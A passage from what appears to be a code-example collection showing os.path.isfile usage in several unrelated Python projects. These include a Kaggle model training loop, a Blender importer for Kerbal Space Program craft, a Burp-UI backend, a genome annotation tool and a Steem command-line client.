iter_train = theano.function([idx], [train_loss_theano, kaggle_loss_theano, segmentation_loss_theano] + theano_printer.get_the_stuff_to_print(),
givens=givens, on_unused_input="ignore", updates=updates,
# mode=NanGuardMode(nan_is_error=True, inf_is_error=True, big_is_error=True)
)
iter_validate = theano.function([idx], [validation_train_loss, validation_kaggle_loss, validation_segmentation_loss] + [v for _, v in validation_other_losses.items()] + theano_printer.get_the_stuff_to_print(),
givens=givens, on_unused_input="ignore")
num_chunks_train = int(config().num_epochs_train * NUM_TRAIN_PATIENTS / (config().batch_size * config().batches_per_chunk))
print "Will train for %d chunks" % num_chunks_train
if config().restart_from_save and os.path.isfile(metadata_path):
print "Load model parameters for resuming"
resume_metadata = np.load(metadata_path)
lasagne.layers.set_all_param_values(top_layer, resume_metadata['param_values'])
start_chunk_idx = resume_metadata['chunks_since_start'] + 1
chunks_train_idcs = range(start_chunk_idx, num_chunks_train)
# set lr to the correct value
current_lr = np.float32(utils.current_learning_rate(learning_rate_schedule, start_chunk_idx))
print " setting learning rate to %.7f" % current_lr
learning_rate.set_value(current_lr)
losses_train = resume_metadata['losses_train']
losses_eval_valid = resume_metadata['losses_eval_valid']
losses_eval_train = resume_metadata['losses_eval_train']
losses_eval_valid_kaggle = [] #resume_metadata['losses_eval_valid_kaggle']
losses_eval_train_kaggle = [] #resume_metadata['losses_eval_train_kaggle']
else:
chunks_train_idcs = range(num_chunks_train)
losses_train = []
losses_eval_valid = []
losses_eval_train = []
losses_eval_valid_kaggle = []
losses_eval_train_kaggle = []
create_train_gen = partial(config().create_train_gen,
required_input_keys = xs_shared.keys(),
required_output_keys = ys_shared.keys()# + ["patients"],
)
create_eval_valid_gen = partial(config().create_eval_valid_gen,
required_input_keys = xs_shared.keys(),
required_output_keys = ys_shared.keys()# + ["patients"]
)
create_eval_train_gen = partial(config().create_eval_train_gen,
required_input_keys = xs_shared.keys(),
required_output_keys = ys_shared.keys()
)
print "Train model"
start_time = time.time()
prev_time = start_time
num_batches_chunk = config().batches_per_chunk
for e, train_data in izip(chunks_train_idcs, buffering.buffered_gen_threaded(create_train_gen())):
print "Chunk %d/%d" % (e + 1, num_chunks_train)
epoch = (1.0 * config().batch_size * config().batches_per_chunk * (e+1) / NUM_TRAIN_PATIENTS)
print " Epoch %.1f" % epoch
for key, rate in learning_rate_schedule.iteritems():
if epoch >= key:
lr = np.float32(rate)
learning_rate.set_value(lr)
print " learning rate %.7f" % lr
if config().dump_network_loaded_data:
pickle.dump(train_data, open("data_loader_dump_train_%d.pkl"%e, "wb"))
for key in xs_shared:
xs_shared[key].set_value(train_data["input"][key])
for key in ys_shared:
ys_shared[key].set_value(train_data["output"][key])
#print "train:", sorted(train_data["output"]["patients"])
losses = []
kaggle_losses = []
segmentation_losses = []
for b in xrange(num_batches_chunk):
iter_result = iter_train(b)
loss, kaggle_loss, segmentation_loss = tuple(iter_result[:3])
utils.detect_nans(loss, xs_shared, ys_shared, all_params)
losses.append(loss)
kaggle_losses.append(kaggle_loss)
segmentation_losses.append(segmentation_loss)
mean_train_loss = np.mean(losses)
print " mean training loss:\t\t%.6f" % mean_train_loss
losses_train.append(mean_train_loss)
print " mean kaggle loss:\t\t%.6f" % np.mean(kaggle_losses)
print " mean segment loss:\t\t%.6f" % np.mean(segmentation_losses)
if ((e + 1) % config().validate_every) == 0:
print
print "Validating"
if config().validate_train_set:
subsets = ["validation", "train"]
gens = [create_eval_valid_gen, create_eval_train_gen]
losses_eval = [losses_eval_valid, losses_eval_train]
losses_kaggle = [losses_eval_valid_kaggle, losses_eval_train_kaggle]
else:
subsets = ["validation"]
gens = [create_eval_valid_gen]
losses_eval = [losses_eval_valid]
losses_kaggle = [losses_eval_valid_kaggle]
for subset, create_gen, losses_validation, losses_kgl in zip(subsets, gens, losses_eval, losses_kaggle):
vld_losses = []
vld_kaggle_losses = []
vld_segmentation_losses = []
vld_other_losses = {k:[] for k,_ in validation_other_losses.items()}
print " %s set (%d samples)" % (subset, get_number_of_validation_samples(set=subset))
for validation_data in buffering.buffered_gen_threaded(create_gen()):
num_batches_chunk_eval = config().batches_per_chunk
if config().dump_network_loaded_data:
pickle.dump(validation_data, open("data_loader_dump_valid_%d.pkl"%e, "wb"))
for key in xs_shared:
xs_shared[key].set_value(validation_data["input"][key])
for key in ys_shared:
ys_shared[key].set_value(validation_data["output"][key])
#print "validate:", validation_data["output"]["patients"]
for b in xrange(num_batches_chunk_eval):
losses = tuple(iter_validate(b)[:3+len(validation_other_losses)])
loss, kaggle_loss, segmentation_loss = losses[:3]
other_losses = losses[3:]
vld_losses.extend(loss)
vld_kaggle_losses.extend(kaggle_loss)
vld_segmentation_losses.extend(segmentation_loss)
for k, other_loss in zip(validation_other_losses, other_losses):
vld_other_losses[k].extend(other_loss)
vld_losses = np.array(vld_losses)
vld_kaggle_losses = np.array(vld_kaggle_losses)
vld_segmentation_losses = np.array(vld_segmentation_losses)
for k in validation_other_losses:
vld_other_losses[k] = np.array(vld_other_losses[k])
# now select only the relevant section to average
sunny_len = get_lenght_of_set(name="sunny", set=subset)
regular_len = get_lenght_of_set(name="regular", set=subset)
num_valid_samples = get_number_of_validation_samples(set=subset)
#print losses[:num_valid_samples]
#print kaggle_losses[:regular_len]
#print segmentation_losses[:sunny_len]
loss_to_save = obj.compute_average(vld_losses[:num_valid_samples])
print " mean training loss:\t\t%.6f" % loss_to_save
print " mean kaggle loss:\t\t%.6f" % np.mean(vld_kaggle_losses[:regular_len])
print " mean segment loss:\t\t%.6f" % np.mean(vld_segmentation_losses[:sunny_len])
# print " acc:\t%.2f%%" % (acc * 100)
for k, v in vld_other_losses.items():
print " mean %s loss:\t\t%.6f" % (k, obj.compute_average(v[:num_valid_samples], loss_name=k))
print
losses_validation.append(loss_to_save)
kaggle_to_save = np.mean(vld_kaggle_losses[:regular_len])
losses_kgl.append(kaggle_to_save)
now = time.time()
time_since_start = now - start_time
time_since_prev = now - prev_time
prev_time = now
est_time_left = time_since_start * (float(num_chunks_train - (e + 1)) / float(e + 1 - chunks_train_idcs[0]))
eta = datetime.now() + timedelta(seconds=est_time_left)
eta_str = eta.strftime("%c")
print " %s since start (%.2f s)" % (utils.hms(time_since_start), time_since_prev)
print " estimated %s to go (ETA: %s)" % (utils.hms(est_time_left), eta_str)
print
if ((e + 1) % config().save_every) == 0:
print
print "Saving metadata, parameters"
with open(metadata_path, 'w') as f:
pickle.dump({
'metadata_path': metadata_path,
'configuration_file': config().__name__,
'git_revision_hash': utils.get_git_revision_hash(),
'experiment_id': expid,
'chunks_since_start': e,
'losses_train': losses_train,
'losses_eval_train': losses_eval_train,
'losses_eval_train_kaggle': losses_eval_train_kaggle,
'losses_eval_valid': losses_eval_valid,
'losses_eval_valid_kaggle': losses_eval_valid_kaggle,
'time_since_start': time_since_start,
'param_values': lasagne.layers.get_all_param_values(top_layer)
}, f, pickle.HIGHEST_PROTOCOL)
print " saved to %s" % metadata_path
print
# store all known outputs from last batch:
if config().take_a_dump:
all_theano_variables = [train_loss_theano, kaggle_loss_theano, segmentation_loss_theano] + theano_printer.get_the_stuff_to_print()
for layer in all_layers[:-1]:
all_theano_variables.append(lasagne.layers.helper.get_output(layer))
iter_train = theano.function([idx], all_theano_variables,
givens=givens, on_unused_input="ignore", updates=updates,
# mode=NanGuardMode(nan_is_error=True, inf_is_error=True, big_is_error=True)
)
train_data["intermediates"] = iter_train(0)
pickle.dump(train_data, open(metadata_path + "-dump", "wb"))
return
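The isfile() check above decides between resuming from a saved checkpoint and starting from scratch: resuming requires both the restart_from_save flag and an existing metadata file. A hedged sketch of that decision (the original loads the pickle with np.load; plain pickle is used here for brevity):

import os
import pickle

def load_checkpoint(metadata_path, restart_from_save=True):
    # Resume only when resuming was requested *and* the checkpoint exists;
    # otherwise the caller starts training from scratch.
    if restart_from_save and os.path.isfile(metadata_path):
        with open(metadata_path, "rb") as fh:
            return pickle.load(fh)
    return None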
Example 55
Project: io_kspblender Source File: import_craft.py
def import_parts(filepath,partdir,right_scale,right_location):
ksp = get_kspdir()
for obj in bpy.context.scene.objects:
obj.select = False
craft = kspcraft(filepath)
print(craft.ship + ' ready for takeoff\n')
print(str(craft.num_parts()) + ' parts found...')
partslist = craft.partslist
doneparts = {} # keep track of parts that have already been imported so I can save time
doneobj = set(bpy.data.objects) # know which objects have gone through the cleaning process
scn = bpy.context.scene # the active scene
#cursor_loc = get_cursor_location()
#to_ground = partslist[0].pos[2]
for part in partslist:
part.partName = part.partName.replace('.','_')
if os.path.isfile(partdir[part.partName][0]): # make sure the part file exists so nothing crashes
print("\n----------------------------------------------------\n") # to make console output easier to look at
if part.partName not in doneparts: # if part has not been imported...
print("Importing "+part.partName+" as "+part.part) # ...say so on the console
bpy.ops.import_object.ksp_mu(filepath=partdir[part.partName][0]) # call the importer
newpart = bpy.context.active_object # set the imported part object to active. from here on, part refers to the part data structure and object to the blender object
newpart.select = True
newpart.name = part.part # rename the object according to the part name (including the number)
newpart.location = Vector(part.pos)#+cursor_loc # move the object
newpart.rotation_quaternion = part.rotQ # rotate the object
if part.partName in right_scale:
newpart.select = True
newpart.scale = right_scale[part.partName]
bpy.ops.object.transform_apply(location = False, rotation = False, scale = True)
bpy.ops.object.select_all(action = 'DESELECT')
print("Scale corrected")
#setup to make lod parts
#meme = bpy.data.meshes.new(part.partName+"_low")
#objobj = bpy.data.objects.new(part.partName+"_low",meme)
#objobj.location = newpart.location
#scn.objects.link(objobj)
print("\n")
# Set a bunch of properties
newpart["partName"] = part.partName
newpart["partClass"] = partdir[part.partName][1]
newpart["mir"] = part.mir
newpart["symMethod"] = part.symMethod
newpart["istg"] = part.istg
newpart["dstg"] = part.dstg
newpart["sidx"] = part.sidx
newpart["sqor"] = part.sqor
newpart["attm"] = part.attm
newpart["modCost"] = part.modCost
newpart["modMass"] = part.modMass
newpart["modSize"] = part.modSize
newpart["ship"] = craft.ship
#newpart["linklist"] = part.linklist
#newpart["attNlist"] = part.attNlist
#newpart["symlist"] = part.symlist
#newpart["srfNlist"] = part.srfNlist ### FIX THESE
newpart["tgt"] = part.tgt
newpart["tgtpos"] = part.tgtpos
newpart["tgtrot"] = part.tgtrot
newpart["tgtdir"] = part.tgtdir
else: # but if part has been imported...
hiddenlist = [] # clunky workaround
for obj in bpy.data.objects: # hidden objects cannot be modified (duplication is what I want to do)
if not obj.is_visible(scn): # find all hidden objects
hiddenlist.append(obj) # create a big stupid list
scn.objects.active = obj # always need to do this to get things to actually happen to objects
obj.hide = False # unhide each one
bpy.ops.object.select_all(action = 'DESELECT') # deselect everything
print("Duplicating "+part.partName+" as "+part.part+"\n") # let me know if the part is just being duplicated
oldpart = bpy.data.objects[doneparts[part.partName]] # have to select the object (2 step process)
oldpart.select = True
bpy.context.scene.objects.active = oldpart
print(oldpart)
bpy.ops.object.select_grouped(type = 'CHILDREN_RECURSIVE') # select all children of the parent object (the empty), which deselects the parent
bpy.data.objects[doneparts[part.partName]].select = True # so reselect the parent
bpy.ops.object.duplicate_move_linked() # duplicate the whole family
copiedpart = oldpart.name + ".001" # the duplicate will be called something.001 always
bpy.ops.object.select_all(action = 'DESELECT') # deselect everything
newpart = bpy.data.objects[copiedpart] # and select just the parent (again, multi-step process)
newpart.select = True
bpy.context.scene.objects.active = newpart
print(bpy.context.active_object)
newpart.name = part.part # rename it
newpart.location = Vector(part.pos)#+cursor_loc # move it
newpart.rotation_quaternion = part.rotQ # rotate it
for obj in hiddenlist: # hide all that annoying stuff again
obj.hide = True
if part.partName in right_location:
newpart.select = True
bpy.ops.transform.translate(value=right_location[part.partName],constraint_axis=(False,False,False),constraint_orientation='LOCAL',mirror=False,proportional='DISABLED',proportional_edit_falloff='SMOOTH',proportional_size=1)
bpy.ops.object.select_all(action = 'DESELECT')
print("Location corrected")
if part.partName not in doneparts: # if the part hasn't been imported before...
doneparts[part.partName] = part.part # ...it has now
objlist = set([obj for obj in bpy.data.objects if obj not in doneobj]) # find all the newly added objects
doneobj = set(bpy.data.objects) # done dealing with all the objects that are now in the scene (except for the ones I'm about to work with in objlist)
emptysize = []
if part.partName == "strutConnector":
add_strut(part,objlist)
elif part.partName == "fuelLine":
add_fuelline(part,objlist)
elif part.partName == "launchClamp1":
add_launchclamp(part,objlist)
else:
for obj in objlist: # for all the unprocesses objects
print(obj.name) # let me know which one we're on
obj['ship'] = craft.ship
if obj.type == 'EMPTY': # if it's an Empty object
if obj.parent != None: # if the Empty is not top-level
obj.hide = True # hide that shyet
print(obj.name + " Hidden\n") # and tell me that they're gone
else: # but if it is top level
obj.empty_draw_type = 'SPHERE' # make that shyet a sphere
obj.empty_draw_size = 0 # a hella tiny sphere
if obj.type == 'MESH': # if it's a Mesh object
scn.objects.active = obj # make it active
if "KSP" not in obj.name:
if obj.data.materials:
material_fixer(obj,part)
#print(1)
#while len(obj.data.materials) > 0:
#obj.data.materials.pop(0, update_data=True)
#bpy.ops.object.material_slot_remove()
bpy.ops.object.mode_set(mode='EDIT') # go into edit mode
bpy.ops.mesh.remove_doubles(threshold = 0.0001) # remove double vertices
bpy.ops.mesh.normals_make_consistent(inside = False) # fix normals
bpy.ops.object.mode_set(mode='OBJECT') # leave edit mode
if len(obj.data.uv_layers):
if "_fixed" not in obj.data.uv_layers[0].name:
obj.data.uv_layers.active.name+="_fixed"
for uvvertex in obj.data.uv_layers.active.data:
uvvertex.uv[1] = -uvvertex.uv[1] + 1
obj.select = True
bpy.ops.object.shade_smooth()
obj.data.use_auto_smooth = True
obj.data.auto_smooth_angle = .610865
bpy.ops.object.select_all(action = 'DESELECT')
if len(obj.data.polygons) == 0: # and if it's one of them stupid fake meshes with no faces
obj.hide = True # gtfo
obj.hide_render = True
root = obj
meshrad = math.sqrt((obj.dimensions[0]/2)**2 + (obj.dimensions[1]/2)**2 + (obj.dimensions[2]/2)**2) # find the radius of the parent Empty such that it encloses the object
emptysize.append(meshrad)
if "coll" in obj.name or "COL" in obj.name or "Col" in obj.name or "fair" in obj.name and 'KSP' not in obj.name: # if it is named anything to do with collider, I'll have none of it
obj.hide = True # gtfo
obj.hide_render = True # really gtfo (don't even render)
#object.select = True # and if I'm really mad
#bpy.ops.object.delete() # I could just delete it
if obj.type != 'EMPTY': # and if it is a mesh (the empties have already been hidden, so this is a double-tap on them)...
print(obj.name + " Hidden\n") # ...let me know
action_fixer(obj)
# for obj in objlist:
# if "KSP" not in obj.name and obj.type == 'MESH':
# if obj.data.materials:
# materialpreserver.main(obj,part)
if part.part in bpy.data.objects: #won't crash and burn here
scn.objects.active = bpy.data.objects[part.part]
if emptysize:
radius = max(emptysize)
else:
radius = bpy.context.active_object.empty_draw_size
if radius < .25:
radius = 0.25
bpy.data.objects[part.part].empty_draw_size = radius
else:
print(part.part + " not imported for some reason... let me know which part!")
bpy.ops.object.select_all(action = 'DESELECT')
print("\n----------------------------------------------------\n")
return craft
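Each part is imported only if its model file is actually on disk, so a single missing file skips that part instead of aborting the whole craft. The per-item guard, stripped to a sketch (partdir maps part names to paths; all names are illustrative):

import os

def importable_parts(partslist, partdir):
    # Yield only the parts whose file exists; report the rest and move on.
    for part_name in partslist:
        path = partdir[part_name][0]
        if os.path.isfile(path):
            yield part_name, path
        else:
            print(part_name + " not imported: file not found at " + path)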
Example 56
def __init__(self, server=None, conf=None):
"""
:param server: ``Burp-UI`` server instance in order to access logger
and/or some global settings
:type server: :class:`burpui.server.BUIServer`
:param conf: Configuration to use
:type conf: :class:`burpui.config.BUIConfig`
"""
self.proc = None
self.app = server
self.client_version = None
self.server_version = None
self.batch_list_supported = False
self.zip64 = G_ZIP64
self.timeout = G_TIMEOUT
self.burpbin = G_BURPBIN
self.stripbin = G_STRIPBIN
self.burpconfcli = G_BURPCONFCLI
self.burpconfsrv = G_BURPCONFSRV
self.includes = G_INCLUDES
self.revoke = G_REVOKE
self.enforce = G_ENFORCE
self.defaults = {
'Burp2': {
'burpbin': G_BURPBIN,
'stripbin': G_STRIPBIN,
'bconfcli': G_BURPCONFCLI,
'bconfsrv': G_BURPCONFSRV,
'timeout': G_TIMEOUT,
'tmpdir': G_TMPDIR,
},
'Experimental': {
'zip64': G_ZIP64,
},
'Security': {
'includes': G_INCLUDES,
'revoke': G_REVOKE,
'enforce': G_ENFORCE,
},
}
tmpdir = G_TMPDIR
self.running = []
version = ''
if conf is not None:
conf.update_defaults(self.defaults)
conf.default_section('Burp2')
self.burpbin = self._get_binary_path(
conf,
'burpbin',
G_BURPBIN,
sect='Burp2'
)
self.stripbin = self._get_binary_path(
conf,
'stripbin',
G_STRIPBIN,
sect='Burp2'
)
confcli = conf.safe_get(
'bconfcli'
)
confsrv = conf.safe_get(
'bconfsrv'
)
self.timeout = conf.safe_get(
'timeout',
'integer'
)
tmpdir = conf.safe_get(
'tmpdir'
)
# Experimental options
self.zip64 = conf.safe_get(
'zip64',
'boolean',
section='Experimental'
)
# Security options
self.includes = conf.safe_get(
'includes',
'force_list',
section='Security'
)
self.enforce = conf.safe_get(
'enforce',
'boolean',
section='Security'
)
self.revoke = conf.safe_get(
'revoke',
'boolean',
section='Security'
)
if confcli and not os.path.isfile(confcli):
self.logger.warning(
"The file '%s' does not exist",
confcli
)
confcli = G_BURPCONFCLI
if confsrv and not os.path.isfile(confsrv):
self.logger.warning(
"The file '%s' does not exist",
confsrv
)
confsrv = G_BURPCONFSRV
if not self.burpbin:
# The burp binary is mandatory for this backend
raise Exception(
'This backend *CAN NOT* work without a burp binary'
)
self.burpconfcli = confcli
self.burpconfsrv = confsrv
if (tmpdir and os.path.exists(tmpdir) and
not os.path.isdir(tmpdir)):
self.logger.warning(
"'%s' is not a directory",
tmpdir
)
if tmpdir == G_TMPDIR:
raise IOError(
"Cannot use '{}' as tmpdir".format(tmpdir)
)
tmpdir = G_TMPDIR
if os.path.exists(tmpdir) and not os.path.isdir(tmpdir):
raise IOError(
"Cannot use '{}' as tmpdir".format(tmpdir)
)
if tmpdir and not os.path.exists(tmpdir):
os.makedirs(tmpdir)
self.tmpdir = tmpdir
# check the burp version because this backend only supports clients
# newer than BURP_MINIMAL_VERSION
try:
cmd = [self.burpbin, '-v']
version = subprocess.check_output(
cmd,
universal_newlines=True
).rstrip()
if version < BURP_MINIMAL_VERSION:
raise Exception(
'Your burp version ({}) does not fit the minimal'
' requirements: {}'.format(version, BURP_MINIMAL_VERSION)
)
except subprocess.CalledProcessError as exp:
raise Exception(
'Unable to determine your burp version: {}'.format(str(exp))
)
self.client_version = version.replace('burp-', '')
self.parser = Parser(self)
self.logger.info('burp binary: {}'.format(self.burpbin))
self.logger.info('strip binary: {}'.format(self.stripbin))
self.logger.info('burp conf cli: {}'.format(self.burpconfcli))
self.logger.info('burp conf srv: {}'.format(self.burpconfsrv))
self.logger.info('command timeout: {}'.format(self.timeout))
self.logger.info('burp version: {}'.format(self.client_version))
self.logger.info('tmpdir: {}'.format(self.tmpdir))
self.logger.info('zip64: {}'.format(self.zip64))
self.logger.info('includes: {}'.format(self.includes))
self.logger.info('enforce: {}'.format(self.enforce))
self.logger.info('revoke: {}'.format(self.revoke))
try:
# make the connection
self.status()
except BUIserverException:
pass
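This backend uses isfile() defensively on configured paths: a missing client or server configuration file produces a warning and a fall-back to the built-in default rather than a crash. A minimal sketch of that fall-back (the logger and names are illustrative):

import os
import logging

logger = logging.getLogger(__name__)

def resolve_conf(path, default):
    # Warn and fall back to the default when the configured file is absent.
    if path and not os.path.isfile(path):
        logger.warning("The file '%s' does not exist", path)
        return default
    return path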
Example 57
def execute(self, args):
"""At a minimum, write a fasta, gff and tbl to output directory. Optionally do more."""
# Verify and read fasta file
fastapath = args.fasta
if not os.path.isfile(fastapath):
sys.stderr.write("Failed to find " + fastapath + ". No genome was loaded.\n")
sys.exit()
sys.stderr.write("Reading fasta...\n")
self.read_fasta(fastapath)
sys.stderr.write("Done.\n")
# Create output directory
out_dir = "gag_output"
if args.out:
out_dir = args.out
os.system('mkdir ' + out_dir)
# Verify and read gff file
# This step also writes genome.ignored.gff,
# genome.invalid.gff and genome.comments.gff
gffpath = args.gff
if not os.path.isfile(gffpath):
sys.stderr.write("Failed to find " + gffpath + ". No genome was loaded.")
return
sys.stderr.write("Reading gff...\n")
self.read_gff(gffpath, out_dir)
sys.stderr.write("Done.\n")
# Calculate stats before genome is modified
sys.stderr.write("Calculating stats on original genome\n")
for seq in self.seqs:
self.stats_mgr.update_ref(seq.stats())
# Optional annotation step
if args.anno:
anno_filename = args.anno
self.annotate_from_file(anno_filename)
# Optional step to trim sequences, subsequences or features
if args.trim:
trim_filename = args.trim
self.trim_from_file(trim_filename)
# Optional step to create start and stop codons
if args.fix_start_stop:
sys.stderr.write("Creating start and stop codons...\n")
self.fix_start_stop_codons()
# Optional step to fix terminal Ns
if args.fix_terminal_ns:
sys.stderr.write("Fixing terminal Ns...\n")
self.fix_terminal_ns()
# Optional filtering steps
# Remove
if args.remove_cds_shorter_than:
min_length = args.remove_cds_shorter_than
sys.stderr.write("Removing CDS shorter than %s...\n" % min_length)
self.apply_filter("cds_shorter_than", min_length, "REMOVE")
if args.remove_cds_longer_than:
max_length = args.remove_cds_longer_than
sys.stderr.write("Removing CDS longer than %s...\n" % max_length)
self.apply_filter("cds_longer_than", max_length, "REMOVE")
if args.remove_exons_shorter_than:
min_length = args.remove_exons_shorter_than
sys.stderr.write("Removing exons shorter than %s...\n" % min_length)
self.apply_filter("exon_shorter_than", min_length, "REMOVE")
if args.remove_exons_longer_than:
max_length = args.remove_exons_longer_than
sys.stderr.write("Removing exons longer than %s...\n" % max_length)
self.apply_filter("exon_longer_than", max_length, "REMOVE")
if args.remove_introns_shorter_than:
min_length = args.remove_introns_shorter_than
sys.stderr.write("Removing exons shorter than %s...\n" % min_length)
self.apply_filter("intron_shorter_than", min_length, "REMOVE")
if args.remove_introns_longer_than:
max_length = args.remove_introns_longer_than
sys.stderr.write("Removing exons longer than %s...\n" % max_length)
self.apply_filter("intron_longer_than", max_length, "REMOVE")
if args.remove_genes_shorter_than:
min_length = args.remove_genes_shorter_than
sys.stderr.write("Removing genes shorter than %s...\n" % min_length)
self.apply_filter("gene_shorter_than", min_length, "REMOVE")
if args.remove_genes_longer_than:
max_length = args.remove_genes_longer_than
sys.stderr.write("Removing genes longer than %s...\n" % max_length)
self.apply_filter("gene_longer_than", max_length, "REMOVE")
# Flag
if args.flag_cds_shorter_than:
min_length = args.flag_cds_shorter_than
sys.stderr.write("Flagging CDS shorter than %s...\n" % min_length)
self.apply_filter("cds_shorter_than", min_length, "FLAG")
if args.flag_cds_longer_than:
max_length = args.flag_cds_longer_than
sys.stderr.write("Flagging CDS longer than %s...\n" % max_length)
self.apply_filter("cds_longer_than", max_length, "FLAG")
if args.flag_exons_shorter_than:
min_length = args.flag_exons_shorter_than
sys.stderr.write("Flagging exons shorter than %s...\n" % min_length)
self.apply_filter("exon_shorter_than", min_length, "FLAG")
if args.flag_exons_longer_than:
max_length = args.flag_exons_longer_than
sys.stderr.write("Flagging exons longer than %s...\n" % max_length)
self.apply_filter("exon_longer_than", max_length, "FLAG")
if args.flag_introns_shorter_than:
min_length = args.flag_introns_shorter_than
sys.stderr.write("Flagging exons shorter than %s...\n" % min_length)
self.apply_filter("intron_shorter_than", min_length, "FLAG")
if args.flag_introns_longer_than:
max_length = args.flag_introns_longer_than
sys.stderr.write("Flagging exons longer than %s...\n" % max_length)
self.apply_filter("intron_longer_than", max_length, "FLAG")
if args.flag_genes_shorter_than:
min_length = args.flag_genes_shorter_than
sys.stderr.write("Flagging genes shorter than %s...\n" % min_length)
self.apply_filter("gene_shorter_than", min_length, "FLAG")
if args.flag_genes_longer_than:
max_length = args.flag_genes_longer_than
sys.stderr.write("Flagging genes longer than %s...\n" % max_length)
self.apply_filter("gene_longer_than", max_length, "FLAG")
# Write fasta, gff and tbl file to output folder
# Open files
fasta = open(out_dir + '/genome.fasta', 'w')
gff = open(out_dir + '/genome.gff', 'w')
tbl = open(out_dir + '/genome.tbl', 'w')
proteins = open(out_dir + '/genome.proteins.fasta', 'w')
removed = open(out_dir + '/genome.removed.gff', 'w')
stats_file = open(out_dir + '/genome.stats', 'w')
# Calculate stats on modified genome
sys.stderr.write("Calculating stats on modified genome\n")
for seq in self.seqs:
self.stats_mgr.update_alt(seq.stats())
# Write stats file
sys.stderr.write("Writing stats file to " + out_dir + "/ ...\n")
for line in self.stats_mgr.summary():
stats_file.write(line)
# Write fasta, gff, tbl, protein fasta
sys.stderr.write("Writing gff, tbl and fasta to " + out_dir + "/ ...\n")
gff.write("##gff-version 3\n")
for seq in self.seqs:
fasta.write(seq.to_fasta())
gff.write(seq.to_gff())
if not args.skip_empty_scaffolds or len(seq.genes) > 0:
# Possibly skip empty sequences
tbl.write(seq.to_tbl())
proteins.write(seq.to_protein_fasta())
# Write removed.gff
for feature in self.removed_features:
removed.write(feature.to_gff())
# Close files
gff.close()
tbl.close()
fasta.close()
proteins.close()
removed.close()
stats_file.close()
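A minimal, self-contained sketch of the same guard pattern (load_annotation and the paths are hypothetical, not part of the project above): check the input with os.path.isfile before loading, and clear a stale output file before writing.
import os
import sys

def load_annotation(gff_path, out_path):
    # Bail out early if the input GFF is missing
    if not os.path.isfile(gff_path):
        sys.stderr.write("Failed to find " + gff_path + ". No genome was loaded.\n")
        return False
    # Remove a stale output file so the new run starts clean
    if os.path.isfile(out_path):
        os.remove(out_path)
    sys.stderr.write("Reading " + gff_path + "...\n")
    # ... parse the GFF and write outputs here ...
    return True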
0
Example 58
def main() :
global args
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Command line tool to interact with the Steem network"
)
"""
Default settings for all tools
"""
parser.add_argument(
'--node',
type=str,
default=config["node"],
help='Websocket URL for public Steem API (default: "wss://this.piston.rocks/")'
)
parser.add_argument(
'--rpcuser',
type=str,
default=config["rpcuser"],
help='Websocket user if authentication is required'
)
parser.add_argument(
'--rpcpassword',
type=str,
default=config["rpcpassword"],
help='Websocket password if authentication is required'
)
parser.add_argument(
'--nobroadcast', '-d',
action='store_true',
help='Do not broadcast anything'
)
parser.add_argument(
'--nowallet', '-p',
action='store_true',
help='Do not load the wallet'
)
parser.add_argument(
'--unsigned', '-x',
action='store_true',
help='Do not try to sign the transaction'
)
parser.add_argument(
'--expires', '-e',
default=30,
help='Expiration time in seconds (defaults to 30)'
)
parser.add_argument(
'--verbose', '-v',
type=int,
default=3,
help='Verbosity'
)
parser.add_argument('--version', action='version',
version='%(prog)s {version}'.format(version=__VERSION__))
subparsers = parser.add_subparsers(help='sub-command help')
"""
Command "set"
"""
setconfig = subparsers.add_parser('set', help='Set configuration')
setconfig.add_argument(
'key',
type=str,
choices=availableConfigurationKeys,
help='Configuration key'
)
setconfig.add_argument(
'value',
type=str,
help='Configuration value'
)
setconfig.set_defaults(command="set")
"""
Command "config"
"""
configconfig = subparsers.add_parser('config', help='Show local configuration')
configconfig.set_defaults(command="config")
"""
Command "info"
"""
parser_info = subparsers.add_parser('info', help='Show infos about piston and Steem')
parser_info.set_defaults(command="info")
"""
Command "changewalletpassphrase"
"""
changepasswordconfig = subparsers.add_parser('changewalletpassphrase', help='Change wallet password')
changepasswordconfig.set_defaults(command="changewalletpassphrase")
"""
Command "addkey"
"""
addkey = subparsers.add_parser('addkey', help='Add a new key to the wallet')
addkey.add_argument(
'wifkeys',
nargs='*',
type=str,
help='the private key in wallet import format (wif)'
)
addkey.set_defaults(command="addkey")
"""
Command "delkey"
"""
delkey = subparsers.add_parser('delkey', help='Delete keys from the wallet')
delkey.add_argument(
'pub',
nargs='*',
type=str,
help='the public key to delete from the wallet'
)
delkey.set_defaults(command="delkey")
"""
Command "getkey"
"""
getkey = subparsers.add_parser('getkey', help='Dump the privatekey of a pubkey from the wallet')
getkey.add_argument(
'pub',
type=str,
help='the public key for which to show the private key'
)
getkey.set_defaults(command="getkey")
"""
Command "listkeys"
"""
listkeys = subparsers.add_parser('listkeys', help='List available keys in your wallet')
listkeys.set_defaults(command="listkeys")
"""
Command "listaccounts"
"""
listaccounts = subparsers.add_parser('listaccounts', help='List available accounts in your wallet')
listaccounts.set_defaults(command="listaccounts")
"""
Command "list"
"""
parser_list = subparsers.add_parser('list', help='List posts on Steem')
parser_list.set_defaults(command="list")
parser_list.add_argument(
'--start',
type=str,
help='Start list from this identifier (pagination)'
)
parser_list.add_argument(
'--category',
type=str,
help='Only posts within this category'
)
parser_list.add_argument(
'--sort',
type=str,
default=config["list_sorting"],
choices=["trending", "created", "active", "cashout", "payout", "votes", "children", "hot"],
help='Sort posts'
)
parser_list.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit posts by number'
)
parser_list.add_argument(
'--columns',
type=str,
nargs="+",
help='Display custom columns'
)
"""
Command "categories"
"""
parser_categories = subparsers.add_parser('categories', help='Show categories')
parser_categories.set_defaults(command="categories")
parser_categories.add_argument(
'--sort',
type=str,
default=config["categories_sorting"],
choices=["trending", "best", "active", "recent"],
help='Sort categories'
)
parser_categories.add_argument(
'category',
nargs="?",
type=str,
help='Only categories used by this author'
)
parser_categories.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit categories by number'
)
"""
Command "read"
"""
parser_read = subparsers.add_parser('read', help='Read a post on Steem')
parser_read.set_defaults(command="read")
parser_read.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to read (e.g. @xeroc/python-steem-0-1)'
)
parser_read.add_argument(
'--full',
action='store_true',
help='Show full header information (YAML formatted)'
)
parser_read.add_argument(
'--comments',
action='store_true',
help='Also show all comments'
)
parser_read.add_argument(
'--parents',
type=int,
default=0,
help='Show x parents for the reply'
)
parser_read.add_argument(
'--format',
type=str,
default=config["format"],
help='Format post',
choices=["markdown", "raw"],
)
"""
Command "post"
"""
